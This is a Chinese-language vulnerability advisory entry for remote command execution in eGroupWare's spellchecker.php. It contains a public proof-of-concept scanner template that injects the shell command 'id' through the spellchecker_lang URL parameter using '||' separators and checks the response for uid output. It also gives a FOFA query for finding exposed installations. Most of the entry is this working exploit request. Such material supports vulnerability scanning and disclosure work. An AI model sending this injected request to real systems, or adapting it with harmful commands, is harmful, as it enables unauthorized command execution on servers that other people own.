egroupware-rce: eGroupWare spellchecker.php 远程命令执行

日期: 2025-09-01 | 影响软件: egroupware | POC: 已公开

漏洞描述

eGroupWare是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装,其中 spellchecker.php 文件中存在命令执行漏洞 fofa: app="EGROUPWARE-产品"

PoC代码[已公开]

id: egroupware-rce

info:
  name: eGroupWare spellchecker.php 远程命令执行
  author: zan8in
  severity: critical
  description: |
    eGroupWare是一个多用户,在以PHP为基础的API上的定制集为基础开发的,以WEB为基础的工作件套装,其中 spellchecker.php 文件中存在命令执行漏洞
    fofa: app="EGROUPWARE-产品"
  reference:
    - http://wiki.peiqi.tech/wiki/webapp/eGroupWare/eGroupWare%20spellchecker.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
rules:
  r0:
    request:
      method: GET
      path: /egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl%7C%7Cid%7C%7C
    expression: |
      response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()

相关漏洞推荐